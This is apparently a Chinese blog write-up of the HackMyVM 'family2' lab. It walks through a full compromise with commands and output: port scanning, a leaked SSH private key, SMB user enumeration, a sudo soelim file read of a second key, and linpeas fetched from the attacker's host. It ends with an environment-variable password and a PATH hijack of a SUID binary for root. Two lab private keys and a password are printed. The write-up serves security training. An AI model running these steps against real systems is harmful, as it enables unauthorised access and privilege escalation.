guayu-kakeru
0%

HMV-family2

发表于 分类于

HMV-family2靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.61  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 16:11 CST
Nmap scan report for bogon (192.168.112.61)
Host is up (0.0028s latency).
Not shown: 991 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
|   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after:  2031-10-29T13:31:43
|_smtp-commands: debian.numericable.fr, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.51
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 11K   2021-10-31 16:25  nicegiftformybaby
|_
|_http-server-header: Apache/2.4.51 (Debian)
110/tcp open  pop3        Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after:  2031-10-29T13:31:43
|_pop3-capabilities: TOP USER CAPA UIDL RESP-CODES PIPELINING SASL(PLAIN) AUTH-RESP-CODE STLS
139/tcp open  netbios-ssn Samba smbd 4
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS more SASL-IR ENABLE LITERAL+ STARTTLS AUTH=PLAINA0001 listed post-login capabilities IDLE ID OK Pre-login have IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after:  2031-10-29T13:31:43
445/tcp open  netbios-ssn Samba smbd 4
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after:  2031-10-29T13:31:43
|_imap-capabilities: LOGIN-REFERRALS SASL-IR ENABLE LITERAL+ more IMAP4rev1 listed post-login capabilities IDLE AUTH=PLAINA0001 OK Pre-login have ID
995/tcp open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after:  2031-10-29T13:31:43
|_ssl-date: TLS randomness does not represent time
MAC Address: 3E:78:10:7B:5C:A0 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Hosts:  debian.numericable.fr, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: FAMILY2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-02-13T08:12:12
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   2.79 ms bogon (192.168.112.61)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.07 seconds

开了很多端口,老规矩先去80看看,如果没有什么信息就去其他端口看看

信息收集

直接访问80可以读取一个一个文件,里面是ssh的私钥

这个是私钥文件的十六进制转储xxd -r可以转换回原始的私钥文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root㉿kakeru)-[~/tmp]
└─# xxd -r tmp > id_rsa
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# cat id_rsa       
-----BEGIN OPENSSH PRIVATE KEY-----
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
OCBlxZRwxH8uUAAAALYmFieUBkZWJpYW4=
-----END OPENSSH PRIVATE KEY-----

本来想直接用hydra爆破ssh,但是这里不能直接用密码登录ssh

1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# ssh root@192.168.112.61          
The authenticity of host '192.168.112.61 (192.168.112.61)' can't be established.
ED25519 key fingerprint is SHA256:6HwEGo4iDv1jBtZC87BkDOsTnZ+MUZAnS9pq7IEaNCo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.112.61' (ED25519) to the list of known hosts.
root@192.168.112.61: Permission denied (publickey).

目录扫描了一波,没有信息。
那就继续回到扫描的端口里面找信息,这里看到还有一个smb,所以用enum4linux扫一下 用-a参数把基本的都扫一下
扫出来了三个用户名,一家人

1
2
3
4
5
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\dad (Local User)
S-1-22-1-1001 Unix User\mum (Local User)
S-1-22-1-1002 Unix User\baby (Local User)

然后用刚刚的私钥去尝试一下
成功登录baby的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kakeru)-[~/tmp]
└─# ssh aaa@192.168.112.61
aaa@192.168.112.61: Permission denied (publickey).
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ssh dad@192.168.112.61 -i id_rsa 
dad@192.168.112.61: Permission denied (publickey).
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.112.61 -i id_rsa
mom@192.168.112.61: Permission denied (publickey).
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# ssh baby@192.168.112.61 -i id_rsa
Linux family2 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Mon Nov  1 13:33:11 2021 from 192.168.0.28
baby@family2:~$

提权

baby

baby有一个mom权限的指令soelim

1
2
3
4
5
6
baby@family2:~$ sudo -l
Matching Defaults entries for baby on family2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family2:
    (mum) NOPASSWD: /usr/bin/soelim


这个指令可以读取任意文件
成功读到mum的私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
baby@family2:/home$ sudo -u mum soelim /home/mum/.ssh/id_rsa
.lf 1 /home/mum/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
JminG0qhVpq/4xAAAACm11bUBkZWJpYW4=
-----END OPENSSH PRIVATE KEY-----

成功登录到mum

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.112.61 -i id_rsa
Linux family2 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Nov  1 13:33:56 2021 from 192.168.0.43
mum@family2:~$

mum

有两个sudo

1
2
3
4
5
6
7
mum@family2:~$ sudo -l
Matching Defaults entries for mum on family2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mum may run the following commands on family2:
    (root) NOPASSWD: /usr/bin/shred -f -z /etc/passwd
    (dad) ALL

root权限这条命令的意思是强制擦除 /etc/passwd 文件,并用零填充,以防数据恢复
虽然有dad的所有权限,但是用dad身份执行命令的时候需要输入密码,我们没有密码
现在再从本机上传linpeas.sh来扫一下

1
2
3
4
5
6
7
8
9
10
11
12
mum@family2:~$ wget 192.168.112.83/linpeas.sh
--2025-02-13 09:59:23--  http://192.168.112.83/linpeas.sh
Connecting to 192.168.112.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 332111 (324K) [text/x-sh]
Saving to: ‘linpeas.sh

linpeas.sh                   100%[=============================================>] 324.33K  --.-KB/s    in 0.01s   

2025-02-13 09:59:24 (26.0 MB/s) - ‘linpeas.sh’ saved [332111/332111]

mum@family2:~$ chmod +x linpeas.sh

在环境变量中成功扫出密码 passwd=LA0172

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
USER=mum
SSH_CLIENT=192.168.112.83 49728 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/mum
SSH_TTY=/dev/pts/1
LOGNAME=mum
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=50
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/sbin:/usr/sbin:/sbin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
passwd=LA0172
LC_ALL=en_US.UTF-8
SSH_CONNECTION=192.168.112.83 49728 192.168.112.61 22
HISTFILE=/dev/null
1
2
3
mum@family2:~$ sudo -u dad /bin/bash
[sudo] password for mum: 
dad@family2:/home/mum$

dad

dad这里sudo需要密码,但是suid里面有个可以的文件是/opt目录里面的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dad@family2:~$ find / -u root -perm -4000 -print 2>/dev/null
dad@family2:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/opt/clock

dad@family2:~$ file /opt/clock
/opt/clock: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c2d23ea9475938a9dd429b6390c97b750d6a1d84, for GNU/Linux 3.2.0, not stripped

有python,开http服务,本地下载这个文件查看一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dad@family2:~$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 
KeyboardInterrupt
>>> cd /opt
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'cd' is not defined
>>> 
KeyboardInterrupt
>>> exit()
dad@family2:~$ cd /opt
dad@family2:/opt$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

用strings看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
┌──(root㉿kakeru)-[~/tmp]
└─# wget 192.168.112.61:8000/clock
--2025-02-13 17:07:13--  http://192.168.112.61:8000/clock
Connecting to 192.168.112.61:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16096 (16K) [application/octet-stream]
Saving to: ‘clock’

clock                        100%[=============================================>]  15.72K  --.-KB/s    in 0s      

2025-02-13 17:07:14 (33.2 MB/s) - ‘clock’ saved [16096/16096]

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# strings clock                    
/lib64/ld-linux-x86-64.so.2
setresuid
system
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
date
;*3$"
GCC: (Debian 10.3.0-11) 10.3.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
suid.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
setresuid@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

里面的指令是date
我们去执行这个程序看看能得到什么

1
2
dad@family2:/opt$ ./clock 
Thu 13 Feb 2025 10:09:26 AM CET

发现就是查看时间
现在我们只要劫持这个date就好了,把data替换成我们需要执行的bash脚本就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
dad@family2:/opt$ echo "/bin/bash" > date
bash: date: Permission denied
dad@family2:/opt$ cd /home/dad
dad@family2:~$ echo "/bin/bash" > date
dad@family2:~$ PATH=^C
.bash_history    .bashrc          .local/          .python_history  
.bash_logout     date             .profile         user.txt         
dad@family2:~$ PATH=/home/dad:$PATH

dad@family2:~$ /opt/clock
Thu 13 Feb 2025 10:11:39 AM CET
dad@family2:~$ chmod +x date
dad@family2:~$ /opt/clock
Thu 13 Feb 2025 10:12:01 AM CET
dad@family2:~$ export PATH=/home/dad:$PATH
dad@family2:~$ /opt/clock
root@family2:~#

这样子把环境变量改成用我们目录下的date,然后内容是/bin/bash这样就直接得到root的shell了

总结

这个靶机还是挺好玩的,结合了很多小知识点,这里web端就直接给了id_rsa,总体难度还是比family1简单一点。
学到了用enum4linux -a 这个方法扫描所有有smb的靶机,得到用户名
提权部分是主要考查环境变量,加深我们对环境变量的理解,用PATH劫持获得shell